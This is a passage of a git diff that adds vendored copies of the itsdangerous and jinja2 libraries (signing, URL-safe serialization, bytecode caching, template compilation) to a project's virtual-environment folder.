+ if ts_int is None: + raise BadTimeSignature("Malformed timestamp", payload=value) + + # Check timestamp is not older than max_age + if max_age is not None: + age = self.get_timestamp() - ts_int + + if age > max_age: + raise SignatureExpired( + f"Signature age {age} > {max_age} seconds", + payload=value, + date_signed=self.timestamp_to_datetime(ts_int), + ) + + if age < 0: + raise SignatureExpired( + f"Signature age {age} < 0 seconds", + payload=value, + date_signed=self.timestamp_to_datetime(ts_int), + ) + + if return_timestamp: + return value, self.timestamp_to_datetime(ts_int) + + return value + + def validate(self, signed_value: _t_str_bytes, max_age: _t_opt_int = None) -> bool: + """Only validates the given signed value. Returns ``True`` if + the signature exists and is valid.""" + try: + self.unsign(signed_value, max_age=max_age) + return True + except BadSignature: + return False + + +class TimedSerializer(Serializer): + """Uses :class:`TimestampSigner` instead of the default + :class:`.Signer`. + """ + + default_signer: _t.Type[TimestampSigner] = TimestampSigner + + def iter_unsigners( + self, salt: _t_opt_str_bytes = None + ) -> _t.Iterator[TimestampSigner]: + return _t.cast("_t.Iterator[TimestampSigner]", super().iter_unsigners(salt)) + + # TODO: Signature is incompatible because parameters were added + # before salt. + + def loads( # type: ignore + self, + s: _t_str_bytes, + max_age: _t_opt_int = None, + return_timestamp: bool = False, + salt: _t_opt_str_bytes = None, + ) -> _t.Any: + """Reverse of :meth:`dumps`, raises :exc:`.BadSignature` if the + signature validation fails. If a ``max_age`` is provided it will + ensure the signature is not older than that time in seconds. In + case the signature is outdated, :exc:`.SignatureExpired` is + raised. All arguments are forwarded to the signer's + :meth:`~TimestampSigner.unsign` method. + """ + s = want_bytes(s) + last_exception = None + + for signer in self.iter_unsigners(salt): + try: + base64d, timestamp = signer.unsign( + s, max_age=max_age, return_timestamp=True + ) + payload = self.load_payload(base64d) + + if return_timestamp: + return payload, timestamp + + return payload + except SignatureExpired: + # The signature was unsigned successfully but was + # expired. Do not try the next signer. + raise + except BadSignature as err: + last_exception = err + + raise _t.cast(BadSignature, last_exception) + + def loads_unsafe( # type: ignore + self, + s: _t_str_bytes, + max_age: _t_opt_int = None, + salt: _t_opt_str_bytes = None, + ) -> _t.Tuple[bool, _t.Any]: + return self._loads_unsafe_impl(s, salt, load_kwargs={"max_age": max_age}) diff --git a/env/Lib/site-packages/itsdangerous/url_safe.py b/env/Lib/site-packages/itsdangerous/url_safe.py new file mode 100644 index 00000000..d5a9b0c2 --- /dev/null +++ b/env/Lib/site-packages/itsdangerous/url_safe.py @@ -0,0 +1,80 @@ +import typing as _t +import zlib + +from ._json import _CompactJSON +from .encoding import base64_decode +from .encoding import base64_encode +from .exc import BadPayload +from .serializer import Serializer +from .timed import TimedSerializer + + +class URLSafeSerializerMixin(Serializer): + """Mixed in with a regular serializer it will attempt to zlib + compress the string to make it shorter if necessary. It will also + base64 encode the string so that it can safely be placed in a URL. 
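This mixin is normally consumed through the two concrete classes defined below; a hedged sketch (editor's illustration, not part of the vendored file, with a placeholder secret)::

    from itsdangerous import URLSafeTimedSerializer

    s = URLSafeTimedSerializer("placeholder-secret", salt="password-reset")
    token = s.dumps({"user_id": 42})       # compact, URL-safe str
    data = s.loads(token, max_age=3600)    # {'user_id': 42}; SignatureExpired after an hour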
+ """ + + default_serializer = _CompactJSON + + def load_payload( + self, + payload: bytes, + *args: _t.Any, + serializer: _t.Optional[_t.Any] = None, + **kwargs: _t.Any, + ) -> _t.Any: + decompress = False + + if payload.startswith(b"."): + payload = payload[1:] + decompress = True + + try: + json = base64_decode(payload) + except Exception as e: + raise BadPayload( + "Could not base64 decode the payload because of an exception", + original_error=e, + ) from e + + if decompress: + try: + json = zlib.decompress(json) + except Exception as e: + raise BadPayload( + "Could not zlib decompress the payload before decoding the payload", + original_error=e, + ) from e + + return super().load_payload(json, *args, **kwargs) + + def dump_payload(self, obj: _t.Any) -> bytes: + json = super().dump_payload(obj) + is_compressed = False + compressed = zlib.compress(json) + + if len(compressed) < (len(json) - 1): + json = compressed + is_compressed = True + + base64d = base64_encode(json) + + if is_compressed: + base64d = b"." + base64d + + return base64d + + +class URLSafeSerializer(URLSafeSerializerMixin, Serializer): + """Works like :class:`.Serializer` but dumps and loads into a URL + safe string consisting of the upper and lowercase character of the + alphabet as well as ``'_'``, ``'-'`` and ``'.'``. + """ + + +class URLSafeTimedSerializer(URLSafeSerializerMixin, TimedSerializer): + """Works like :class:`.TimedSerializer` but dumps and loads into a + URL safe string consisting of the upper and lowercase character of + the alphabet as well as ``'_'``, ``'-'`` and ``'.'``. + """ diff --git a/env/Lib/site-packages/jinja2/__init__.py b/env/Lib/site-packages/jinja2/__init__.py new file mode 100644 index 00000000..e3239267 --- /dev/null +++ b/env/Lib/site-packages/jinja2/__init__.py @@ -0,0 +1,37 @@ +"""Jinja is a template engine written in pure Python. It provides a +non-XML syntax that supports inline expressions and an optional +sandboxed environment. 
+""" +from .bccache import BytecodeCache as BytecodeCache +from .bccache import FileSystemBytecodeCache as FileSystemBytecodeCache +from .bccache import MemcachedBytecodeCache as MemcachedBytecodeCache +from .environment import Environment as Environment +from .environment import Template as Template +from .exceptions import TemplateAssertionError as TemplateAssertionError +from .exceptions import TemplateError as TemplateError +from .exceptions import TemplateNotFound as TemplateNotFound +from .exceptions import TemplateRuntimeError as TemplateRuntimeError +from .exceptions import TemplatesNotFound as TemplatesNotFound +from .exceptions import TemplateSyntaxError as TemplateSyntaxError +from .exceptions import UndefinedError as UndefinedError +from .loaders import BaseLoader as BaseLoader +from .loaders import ChoiceLoader as ChoiceLoader +from .loaders import DictLoader as DictLoader +from .loaders import FileSystemLoader as FileSystemLoader +from .loaders import FunctionLoader as FunctionLoader +from .loaders import ModuleLoader as ModuleLoader +from .loaders import PackageLoader as PackageLoader +from .loaders import PrefixLoader as PrefixLoader +from .runtime import ChainableUndefined as ChainableUndefined +from .runtime import DebugUndefined as DebugUndefined +from .runtime import make_logging_undefined as make_logging_undefined +from .runtime import StrictUndefined as StrictUndefined +from .runtime import Undefined as Undefined +from .utils import clear_caches as clear_caches +from .utils import is_undefined as is_undefined +from .utils import pass_context as pass_context +from .utils import pass_environment as pass_environment +from .utils import pass_eval_context as pass_eval_context +from .utils import select_autoescape as select_autoescape + +__version__ = "3.1.2" diff --git a/env/Lib/site-packages/jinja2/_identifier.py b/env/Lib/site-packages/jinja2/_identifier.py new file mode 100644 index 00000000..928c1503 --- /dev/null +++ b/env/Lib/site-packages/jinja2/_identifier.py @@ -0,0 +1,6 @@ +import re + +# generated by scripts/generate_identifier_pattern.py +pattern = re.compile( + r"[\w·̀-ͯ·҃-֑҇-ׇֽֿׁׂׅׄؐ-ًؚ-ٰٟۖ-ۜ۟-۪ۤۧۨ-ܑۭܰ-݊ަ-ް߫-߽߳ࠖ-࠙ࠛ-ࠣࠥ-ࠧࠩ-࡙࠭-࡛࣓-ࣣ࣡-ःऺ-़ा-ॏ॑-ॗॢॣঁ-ঃ়া-ৄেৈো-্ৗৢৣ৾ਁ-ਃ਼ਾ-ੂੇੈੋ-੍ੑੰੱੵઁ-ઃ઼ા-ૅે-ૉો-્ૢૣૺ-૿ଁ-ଃ଼ା-ୄେୈୋ-୍ୖୗୢୣஂா-ூெ-ைொ-்ௗఀ-ఄా-ౄె-ైొ-్ౕౖౢౣಁ-ಃ಼ಾ-ೄೆ-ೈೊ-್ೕೖೢೣഀ-ഃ഻഼ാ-ൄെ-ൈൊ-്ൗൢൣංඃ්ා-ුූෘ-ෟෲෳัิ-ฺ็-๎ັິ-ູົຼ່-ໍ༹༘༙༵༷༾༿ཱ-྄྆྇ྍ-ྗྙ-ྼ࿆ါ-ှၖ-ၙၞ-ၠၢ-ၤၧ-ၭၱ-ၴႂ-ႍႏႚ-ႝ፝-፟ᜒ-᜔ᜲ-᜴ᝒᝓᝲᝳ឴-៓៝᠋-᠍ᢅᢆᢩᤠ-ᤫᤰ-᤻ᨗ-ᨛᩕ-ᩞ᩠-᩿᩼᪰-᪽ᬀ-ᬄ᬴-᭄᭫-᭳ᮀ-ᮂᮡ-ᮭ᯦-᯳ᰤ-᰷᳐-᳔᳒-᳨᳭ᳲ-᳴᳷-᳹᷀-᷹᷻-᷿‿⁀⁔⃐-⃥⃜⃡-⃰℘℮⳯-⵿⳱ⷠ-〪ⷿ-゙゚〯꙯ꙴ-꙽ꚞꚟ꛰꛱ꠂ꠆ꠋꠣ-ꠧꢀꢁꢴ-ꣅ꣠-꣱ꣿꤦ-꤭ꥇ-꥓ꦀ-ꦃ꦳-꧀ꧥꨩ-ꨶꩃꩌꩍꩻ-ꩽꪰꪲ-ꪴꪷꪸꪾ꪿꫁ꫫ-ꫯꫵ꫶ꯣ-ꯪ꯬꯭ﬞ︀-️︠-︯︳︴﹍-﹏_𐇽𐋠𐍶-𐍺𐨁-𐨃𐨅𐨆𐨌-𐨏𐨸-𐨿𐨺𐫦𐫥𐴤-𐽆𐴧-𐽐𑀀-𑀂𑀸-𑁆𑁿-𑂂𑂰-𑂺𑄀-𑄂𑄧-𑄴𑅅𑅆𑅳𑆀-𑆂𑆳-𑇀𑇉-𑇌𑈬-𑈷𑈾𑋟-𑋪𑌀-𑌃𑌻𑌼𑌾-𑍄𑍇𑍈𑍋-𑍍𑍗𑍢𑍣𑍦-𑍬𑍰-𑍴𑐵-𑑆𑑞𑒰-𑓃𑖯-𑖵𑖸-𑗀𑗜𑗝𑘰-𑙀𑚫-𑚷𑜝-𑜫𑠬-𑠺𑨁-𑨊𑨳-𑨹𑨻-𑨾𑩇𑩑-𑩛𑪊-𑪙𑰯-𑰶𑰸-𑰿𑲒-𑲧𑲩-𑲶𑴱-𑴶𑴺𑴼𑴽𑴿-𑵅𑵇𑶊-𑶎𑶐𑶑𑶓-𑶗𑻳-𑻶𖫰-𖫴𖬰-𖬶𖽑-𖽾𖾏-𖾒𛲝𛲞𝅥-𝅩𝅭-𝅲𝅻-𝆂𝆅-𝆋𝆪-𝆭𝉂-𝉄𝨀-𝨶𝨻-𝩬𝩵𝪄𝪛-𝪟𝪡-𝪯𞀀-𞀆𞀈-𞀘𞀛-𞀡𞀣𞀤𞀦-𞣐𞀪-𞣖𞥄-𞥊󠄀-󠇯]+" # noqa: B950 +) diff --git a/env/Lib/site-packages/jinja2/async_utils.py b/env/Lib/site-packages/jinja2/async_utils.py new file mode 100644 index 00000000..1a4f3892 --- /dev/null +++ b/env/Lib/site-packages/jinja2/async_utils.py @@ -0,0 +1,84 @@ +import inspect +import typing as t +from functools import WRAPPER_ASSIGNMENTS +from functools import wraps + +from .utils import _PassArg +from .utils import pass_eval_context + +V = t.TypeVar("V") + + +def async_variant(normal_func): # type: ignore + def decorator(async_func): # type: ignore + pass_arg = _PassArg.from_obj(normal_func) + need_eval_context = pass_arg is None + + if pass_arg is _PassArg.environment: + + def is_async(args: t.Any) -> bool: + return t.cast(bool, 
args[0].is_async) + + else: + + def is_async(args: t.Any) -> bool: + return t.cast(bool, args[0].environment.is_async) + + # Take the doc and annotations from the sync function, but the + # name from the async function. Pallets-Sphinx-Themes + # build_function_directive expects __wrapped__ to point to the + # sync function. + async_func_attrs = ("__module__", "__name__", "__qualname__") + normal_func_attrs = tuple(set(WRAPPER_ASSIGNMENTS).difference(async_func_attrs)) + + @wraps(normal_func, assigned=normal_func_attrs) + @wraps(async_func, assigned=async_func_attrs, updated=()) + def wrapper(*args, **kwargs): # type: ignore + b = is_async(args) + + if need_eval_context: + args = args[1:] + + if b: + return async_func(*args, **kwargs) + + return normal_func(*args, **kwargs) + + if need_eval_context: + wrapper = pass_eval_context(wrapper) + + wrapper.jinja_async_variant = True + return wrapper + + return decorator + + +_common_primitives = {int, float, bool, str, list, dict, tuple, type(None)} + + +async def auto_await(value: t.Union[t.Awaitable["V"], "V"]) -> "V": + # Avoid a costly call to isawaitable + if type(value) in _common_primitives: + return t.cast("V", value) + + if inspect.isawaitable(value): + return await t.cast("t.Awaitable[V]", value) + + return t.cast("V", value) + + +async def auto_aiter( + iterable: "t.Union[t.AsyncIterable[V], t.Iterable[V]]", +) -> "t.AsyncIterator[V]": + if hasattr(iterable, "__aiter__"): + async for item in t.cast("t.AsyncIterable[V]", iterable): + yield item + else: + for item in t.cast("t.Iterable[V]", iterable): + yield item + + +async def auto_to_list( + value: "t.Union[t.AsyncIterable[V], t.Iterable[V]]", +) -> t.List["V"]: + return [x async for x in auto_aiter(value)] diff --git a/env/Lib/site-packages/jinja2/bccache.py b/env/Lib/site-packages/jinja2/bccache.py new file mode 100644 index 00000000..d0ddf56e --- /dev/null +++ b/env/Lib/site-packages/jinja2/bccache.py @@ -0,0 +1,406 @@ +"""The optional bytecode cache system. This is useful if you have very +complex template situations and the compilation of all those templates +slows down your application too much. + +Situations where this is useful are often forking web applications that +are initialized on the first request. +""" +import errno +import fnmatch +import marshal +import os +import pickle +import stat +import sys +import tempfile +import typing as t +from hashlib import sha1 +from io import BytesIO +from types import CodeType + +if t.TYPE_CHECKING: + import typing_extensions as te + from .environment import Environment + + class _MemcachedClient(te.Protocol): + def get(self, key: str) -> bytes: + ... + + def set(self, key: str, value: bytes, timeout: t.Optional[int] = None) -> None: + ... + + +bc_version = 5 +# Magic bytes to identify Jinja bytecode cache files. Contains the +# Python major and minor version to avoid loading incompatible bytecode +# if a project upgrades its Python version. +bc_magic = ( + b"j2" + + pickle.dumps(bc_version, 2) + + pickle.dumps((sys.version_info[0] << 24) | sys.version_info[1], 2) +) + + +class Bucket: + """Buckets are used to store the bytecode for one template. It's created + and initialized by the bytecode cache and passed to the loading functions. + + The buckets get an internal checksum from the cache assigned and use this + to automatically reject outdated cache material. Individual bytecode + cache subclasses don't have to care about cache invalidation. 
+ """ + + def __init__(self, environment: "Environment", key: str, checksum: str) -> None: + self.environment = environment + self.key = key + self.checksum = checksum + self.reset() + + def reset(self) -> None: + """Resets the bucket (unloads the bytecode).""" + self.code: t.Optional[CodeType] = None + + def load_bytecode(self, f: t.BinaryIO) -> None: + """Loads bytecode from a file or file like object.""" + # make sure the magic header is correct + magic = f.read(len(bc_magic)) + if magic != bc_magic: + self.reset() + return + # the source code of the file changed, we need to reload + checksum = pickle.load(f) + if self.checksum != checksum: + self.reset() + return + # if marshal_load fails then we need to reload + try: + self.code = marshal.load(f) + except (EOFError, ValueError, TypeError): + self.reset() + return + + def write_bytecode(self, f: t.IO[bytes]) -> None: + """Dump the bytecode into the file or file like object passed.""" + if self.code is None: + raise TypeError("can't write empty bucket") + f.write(bc_magic) + pickle.dump(self.checksum, f, 2) + marshal.dump(self.code, f) + + def bytecode_from_string(self, string: bytes) -> None: + """Load bytecode from bytes.""" + self.load_bytecode(BytesIO(string)) + + def bytecode_to_string(self) -> bytes: + """Return the bytecode as bytes.""" + out = BytesIO() + self.write_bytecode(out) + return out.getvalue() + + +class BytecodeCache: + """To implement your own bytecode cache you have to subclass this class + and override :meth:`load_bytecode` and :meth:`dump_bytecode`. Both of + these methods are passed a :class:`~jinja2.bccache.Bucket`. + + A very basic bytecode cache that saves the bytecode on the file system:: + + from os import path + + class MyCache(BytecodeCache): + + def __init__(self, directory): + self.directory = directory + + def load_bytecode(self, bucket): + filename = path.join(self.directory, bucket.key) + if path.exists(filename): + with open(filename, 'rb') as f: + bucket.load_bytecode(f) + + def dump_bytecode(self, bucket): + filename = path.join(self.directory, bucket.key) + with open(filename, 'wb') as f: + bucket.write_bytecode(f) + + A more advanced version of a filesystem based bytecode cache is part of + Jinja. + """ + + def load_bytecode(self, bucket: Bucket) -> None: + """Subclasses have to override this method to load bytecode into a + bucket. If they are not able to find code in the cache for the + bucket, it must not do anything. + """ + raise NotImplementedError() + + def dump_bytecode(self, bucket: Bucket) -> None: + """Subclasses have to override this method to write the bytecode + from a bucket back to the cache. If it unable to do so it must not + fail silently but raise an exception. + """ + raise NotImplementedError() + + def clear(self) -> None: + """Clears the cache. This method is not used by Jinja but should be + implemented to allow applications to clear the bytecode cache used + by a particular environment. 
+ """ + + def get_cache_key( + self, name: str, filename: t.Optional[t.Union[str]] = None + ) -> str: + """Returns the unique hash key for this template name.""" + hash = sha1(name.encode("utf-8")) + + if filename is not None: + hash.update(f"|{filename}".encode()) + + return hash.hexdigest() + + def get_source_checksum(self, source: str) -> str: + """Returns a checksum for the source.""" + return sha1(source.encode("utf-8")).hexdigest() + + def get_bucket( + self, + environment: "Environment", + name: str, + filename: t.Optional[str], + source: str, + ) -> Bucket: + """Return a cache bucket for the given template. All arguments are + mandatory but filename may be `None`. + """ + key = self.get_cache_key(name, filename) + checksum = self.get_source_checksum(source) + bucket = Bucket(environment, key, checksum) + self.load_bytecode(bucket) + return bucket + + def set_bucket(self, bucket: Bucket) -> None: + """Put the bucket into the cache.""" + self.dump_bytecode(bucket) + + +class FileSystemBytecodeCache(BytecodeCache): + """A bytecode cache that stores bytecode on the filesystem. It accepts + two arguments: The directory where the cache items are stored and a + pattern string that is used to build the filename. + + If no directory is specified a default cache directory is selected. On + Windows the user's temp directory is used, on UNIX systems a directory + is created for the user in the system temp directory. + + The pattern can be used to have multiple separate caches operate on the + same directory. The default pattern is ``'__jinja2_%s.cache'``. ``%s`` + is replaced with the cache key. + + >>> bcc = FileSystemBytecodeCache('/tmp/jinja_cache', '%s.cache') + + This bytecode cache supports clearing of the cache using the clear method. + """ + + def __init__( + self, directory: t.Optional[str] = None, pattern: str = "__jinja2_%s.cache" + ) -> None: + if directory is None: + directory = self._get_default_cache_dir() + self.directory = directory + self.pattern = pattern + + def _get_default_cache_dir(self) -> str: + def _unsafe_dir() -> "te.NoReturn": + raise RuntimeError( + "Cannot determine safe temp directory. You " + "need to explicitly provide one." + ) + + tmpdir = tempfile.gettempdir() + + # On windows the temporary directory is used specific unless + # explicitly forced otherwise. We can just use that. + if os.name == "nt": + return tmpdir + if not hasattr(os, "getuid"): + _unsafe_dir() + + dirname = f"_jinja2-cache-{os.getuid()}" + actual_dir = os.path.join(tmpdir, dirname) + + try: + os.mkdir(actual_dir, stat.S_IRWXU) + except OSError as e: + if e.errno != errno.EEXIST: + raise + try: + os.chmod(actual_dir, stat.S_IRWXU) + actual_dir_stat = os.lstat(actual_dir) + if ( + actual_dir_stat.st_uid != os.getuid() + or not stat.S_ISDIR(actual_dir_stat.st_mode) + or stat.S_IMODE(actual_dir_stat.st_mode) != stat.S_IRWXU + ): + _unsafe_dir() + except OSError as e: + if e.errno != errno.EEXIST: + raise + + actual_dir_stat = os.lstat(actual_dir) + if ( + actual_dir_stat.st_uid != os.getuid() + or not stat.S_ISDIR(actual_dir_stat.st_mode) + or stat.S_IMODE(actual_dir_stat.st_mode) != stat.S_IRWXU + ): + _unsafe_dir() + + return actual_dir + + def _get_cache_filename(self, bucket: Bucket) -> str: + return os.path.join(self.directory, self.pattern % (bucket.key,)) + + def load_bytecode(self, bucket: Bucket) -> None: + filename = self._get_cache_filename(bucket) + + # Don't test for existence before opening the file, since the + # file could disappear after the test before the open. 
+ try: + f = open(filename, "rb") + except (FileNotFoundError, IsADirectoryError, PermissionError): + # PermissionError can occur on Windows when an operation is + # in progress, such as calling clear(). + return + + with f: + bucket.load_bytecode(f) + + def dump_bytecode(self, bucket: Bucket) -> None: + # Write to a temporary file, then rename to the real name after + # writing. This avoids another process reading the file before + # it is fully written. + name = self._get_cache_filename(bucket) + f = tempfile.NamedTemporaryFile( + mode="wb", + dir=os.path.dirname(name), + prefix=os.path.basename(name), + suffix=".tmp", + delete=False, + ) + + def remove_silent() -> None: + try: + os.remove(f.name) + except OSError: + # Another process may have called clear(). On Windows, + # another program may be holding the file open. + pass + + try: + with f: + bucket.write_bytecode(f) + except BaseException: + remove_silent() + raise + + try: + os.replace(f.name, name) + except OSError: + # Another process may have called clear(). On Windows, + # another program may be holding the file open. + remove_silent() + except BaseException: + remove_silent() + raise + + def clear(self) -> None: + # imported lazily here because google app-engine doesn't support + # write access on the file system and the function does not exist + # normally. + from os import remove + + files = fnmatch.filter(os.listdir(self.directory), self.pattern % ("*",)) + for filename in files: + try: + remove(os.path.join(self.directory, filename)) + except OSError: + pass + + +class MemcachedBytecodeCache(BytecodeCache): + """This class implements a bytecode cache that uses a memcache cache for + storing the information. It does not enforce a specific memcache library + (tummy's memcache or cmemcache) but will accept any class that provides + the minimal interface required. + + Libraries compatible with this class: + + - `cachelib `_ + - `python-memcached `_ + + (Unfortunately the django cache interface is not compatible because it + does not support storing binary data, only text. You can however pass + the underlying cache client to the bytecode cache which is available + as `django.core.cache.cache._client`.) + + The minimal interface for the client passed to the constructor is this: + + .. class:: MinimalClientInterface + + .. method:: set(key, value[, timeout]) + + Stores the bytecode in the cache. `value` is a string and + `timeout` the timeout of the key. If timeout is not provided + a default timeout or no timeout should be assumed, if it's + provided it's an integer with the number of seconds the cache + item should exist. + + .. method:: get(key) + + Returns the value for the cache key. If the item does not + exist in the cache the return value must be `None`. + + The other arguments to the constructor are the prefix for all keys that + is added before the actual cache key and the timeout for the bytecode in + the cache system. We recommend a high (or no) timeout. + + This bytecode cache does not support clearing of used items in the cache. + The clear method is a no-operation function. + + .. versionadded:: 2.7 + Added support for ignoring memcache errors through the + `ignore_memcache_errors` parameter. 
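Whichever backend is chosen, it is enabled by passing an instance to the environment; a hedged sketch (editor's note, not part of the vendored file; the cache directory is a placeholder)::

    from jinja2 import Environment, FileSystemBytecodeCache

    env = Environment(bytecode_cache=FileSystemBytecodeCache("/tmp/jinja_cache"))
    # Compiled template bytecode is now written to and reused from
    # /tmp/jinja_cache across processes and restarts.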
+ """ + + def __init__( + self, + client: "_MemcachedClient", + prefix: str = "jinja2/bytecode/", + timeout: t.Optional[int] = None, + ignore_memcache_errors: bool = True, + ): + self.client = client + self.prefix = prefix + self.timeout = timeout + self.ignore_memcache_errors = ignore_memcache_errors + + def load_bytecode(self, bucket: Bucket) -> None: + try: + code = self.client.get(self.prefix + bucket.key) + except Exception: + if not self.ignore_memcache_errors: + raise + else: + bucket.bytecode_from_string(code) + + def dump_bytecode(self, bucket: Bucket) -> None: + key = self.prefix + bucket.key + value = bucket.bytecode_to_string() + + try: + if self.timeout is not None: + self.client.set(key, value, self.timeout) + else: + self.client.set(key, value) + except Exception: + if not self.ignore_memcache_errors: + raise diff --git a/env/Lib/site-packages/jinja2/compiler.py b/env/Lib/site-packages/jinja2/compiler.py new file mode 100644 index 00000000..3458095f --- /dev/null +++ b/env/Lib/site-packages/jinja2/compiler.py @@ -0,0 +1,1957 @@ +"""Compiles nodes from the parser into Python code.""" +import typing as t +from contextlib import contextmanager +from functools import update_wrapper +from io import StringIO +from itertools import chain +from keyword import iskeyword as is_python_keyword + +from markupsafe import escape +from markupsafe import Markup + +from . import nodes +from .exceptions import TemplateAssertionError +from .idtracking import Symbols +from .idtracking import VAR_LOAD_ALIAS +from .idtracking import VAR_LOAD_PARAMETER +from .idtracking import VAR_LOAD_RESOLVE +from .idtracking import VAR_LOAD_UNDEFINED +from .nodes import EvalContext +from .optimizer import Optimizer +from .utils import _PassArg +from .utils import concat +from .visitor import NodeVisitor + +if t.TYPE_CHECKING: + import typing_extensions as te + from .environment import Environment + +F = t.TypeVar("F", bound=t.Callable[..., t.Any]) + +operators = { + "eq": "==", + "ne": "!=", + "gt": ">", + "gteq": ">=", + "lt": "<", + "lteq": "<=", + "in": "in", + "notin": "not in", +} + + +def optimizeconst(f: F) -> F: + def new_func( + self: "CodeGenerator", node: nodes.Expr, frame: "Frame", **kwargs: t.Any + ) -> t.Any: + # Only optimize if the frame is not volatile + if self.optimizer is not None and not frame.eval_ctx.volatile: + new_node = self.optimizer.visit(node, frame.eval_ctx) + + if new_node != node: + return self.visit(new_node, frame) + + return f(self, node, frame, **kwargs) + + return update_wrapper(t.cast(F, new_func), f) + + +def _make_binop(op: str) -> t.Callable[["CodeGenerator", nodes.BinExpr, "Frame"], None]: + @optimizeconst + def visitor(self: "CodeGenerator", node: nodes.BinExpr, frame: Frame) -> None: + if ( + self.environment.sandboxed + and op in self.environment.intercepted_binops # type: ignore + ): + self.write(f"environment.call_binop(context, {op!r}, ") + self.visit(node.left, frame) + self.write(", ") + self.visit(node.right, frame) + else: + self.write("(") + self.visit(node.left, frame) + self.write(f" {op} ") + self.visit(node.right, frame) + + self.write(")") + + return visitor + + +def _make_unop( + op: str, +) -> t.Callable[["CodeGenerator", nodes.UnaryExpr, "Frame"], None]: + @optimizeconst + def visitor(self: "CodeGenerator", node: nodes.UnaryExpr, frame: Frame) -> None: + if ( + self.environment.sandboxed + and op in self.environment.intercepted_unops # type: ignore + ): + self.write(f"environment.call_unop(context, {op!r}, ") + self.visit(node.node, frame) + else: + 
self.write("(" + op) + self.visit(node.node, frame) + + self.write(")") + + return visitor + + +def generate( + node: nodes.Template, + environment: "Environment", + name: t.Optional[str], + filename: t.Optional[str], + stream: t.Optional[t.TextIO] = None, + defer_init: bool = False, + optimized: bool = True, +) -> t.Optional[str]: + """Generate the python source for a node tree.""" + if not isinstance(node, nodes.Template): + raise TypeError("Can't compile non template nodes") + + generator = environment.code_generator_class( + environment, name, filename, stream, defer_init, optimized + ) + generator.visit(node) + + if stream is None: + return generator.stream.getvalue() # type: ignore + + return None + + +def has_safe_repr(value: t.Any) -> bool: + """Does the node have a safe representation?""" + if value is None or value is NotImplemented or value is Ellipsis: + return True + + if type(value) in {bool, int, float, complex, range, str, Markup}: + return True + + if type(value) in {tuple, list, set, frozenset}: + return all(has_safe_repr(v) for v in value) + + if type(value) is dict: + return all(has_safe_repr(k) and has_safe_repr(v) for k, v in value.items()) + + return False + + +def find_undeclared( + nodes: t.Iterable[nodes.Node], names: t.Iterable[str] +) -> t.Set[str]: + """Check if the names passed are accessed undeclared. The return value + is a set of all the undeclared names from the sequence of names found. + """ + visitor = UndeclaredNameVisitor(names) + try: + for node in nodes: + visitor.visit(node) + except VisitorExit: + pass + return visitor.undeclared + + +class MacroRef: + def __init__(self, node: t.Union[nodes.Macro, nodes.CallBlock]) -> None: + self.node = node + self.accesses_caller = False + self.accesses_kwargs = False + self.accesses_varargs = False + + +class Frame: + """Holds compile time information for us.""" + + def __init__( + self, + eval_ctx: EvalContext, + parent: t.Optional["Frame"] = None, + level: t.Optional[int] = None, + ) -> None: + self.eval_ctx = eval_ctx + + # the parent of this frame + self.parent = parent + + if parent is None: + self.symbols = Symbols(level=level) + + # in some dynamic inheritance situations the compiler needs to add + # write tests around output statements. + self.require_output_check = False + + # inside some tags we are using a buffer rather than yield statements. + # this for example affects {% filter %} or {% macro %}. If a frame + # is buffered this variable points to the name of the list used as + # buffer. + self.buffer: t.Optional[str] = None + + # the name of the block we're in, otherwise None. + self.block: t.Optional[str] = None + + else: + self.symbols = Symbols(parent.symbols, level=level) + self.require_output_check = parent.require_output_check + self.buffer = parent.buffer + self.block = parent.block + + # a toplevel frame is the root + soft frames such as if conditions. + self.toplevel = False + + # the root frame is basically just the outermost frame, so no if + # conditions. This information is used to optimize inheritance + # situations. + self.rootlevel = False + + # variables set inside of loops and blocks should not affect outer frames, + # but they still needs to be kept track of as part of the active context. + self.loop_frame = False + self.block_frame = False + + # track whether the frame is being used in an if-statement or conditional + # expression as it determines which errors should be raised during runtime + # or compile time. 
+ self.soft_frame = False + + def copy(self) -> "Frame": + """Create a copy of the current one.""" + rv = object.__new__(self.__class__) + rv.__dict__.update(self.__dict__) + rv.symbols = self.symbols.copy() + return rv + + def inner(self, isolated: bool = False) -> "Frame": + """Return an inner frame.""" + if isolated: + return Frame(self.eval_ctx, level=self.symbols.level + 1) + return Frame(self.eval_ctx, self) + + def soft(self) -> "Frame": + """Return a soft frame. A soft frame may not be modified as + standalone thing as it shares the resources with the frame it + was created of, but it's not a rootlevel frame any longer. + + This is only used to implement if-statements and conditional + expressions. + """ + rv = self.copy() + rv.rootlevel = False + rv.soft_frame = True + return rv + + __copy__ = copy + + +class VisitorExit(RuntimeError): + """Exception used by the `UndeclaredNameVisitor` to signal a stop.""" + + +class DependencyFinderVisitor(NodeVisitor): + """A visitor that collects filter and test calls.""" + + def __init__(self) -> None: + self.filters: t.Set[str] = set() + self.tests: t.Set[str] = set() + + def visit_Filter(self, node: nodes.Filter) -> None: + self.generic_visit(node) + self.filters.add(node.name) + + def visit_Test(self, node: nodes.Test) -> None: + self.generic_visit(node) + self.tests.add(node.name) + + def visit_Block(self, node: nodes.Block) -> None: + """Stop visiting at blocks.""" + + +class UndeclaredNameVisitor(NodeVisitor): + """A visitor that checks if a name is accessed without being + declared. This is different from the frame visitor as it will + not stop at closure frames. + """ + + def __init__(self, names: t.Iterable[str]) -> None: + self.names = set(names) + self.undeclared: t.Set[str] = set() + + def visit_Name(self, node: nodes.Name) -> None: + if node.ctx == "load" and node.name in self.names: + self.undeclared.add(node.name) + if self.undeclared == self.names: + raise VisitorExit() + else: + self.names.discard(node.name) + + def visit_Block(self, node: nodes.Block) -> None: + """Stop visiting a blocks.""" + + +class CompilerExit(Exception): + """Raised if the compiler encountered a situation where it just + doesn't make sense to further process the code. Any block that + raises such an exception is not further processed. + """ + + +class CodeGenerator(NodeVisitor): + def __init__( + self, + environment: "Environment", + name: t.Optional[str], + filename: t.Optional[str], + stream: t.Optional[t.TextIO] = None, + defer_init: bool = False, + optimized: bool = True, + ) -> None: + if stream is None: + stream = StringIO() + self.environment = environment + self.name = name + self.filename = filename + self.stream = stream + self.created_block_context = False + self.defer_init = defer_init + self.optimizer: t.Optional[Optimizer] = None + + if optimized: + self.optimizer = Optimizer(environment) + + # aliases for imports + self.import_aliases: t.Dict[str, str] = {} + + # a registry for all blocks. Because blocks are moved out + # into the global python scope they are registered here + self.blocks: t.Dict[str, nodes.Block] = {} + + # the number of extends statements so far + self.extends_so_far = 0 + + # some templates have a rootlevel extends. In this case we + # can safely assume that we're a child template and do some + # more optimizations. 
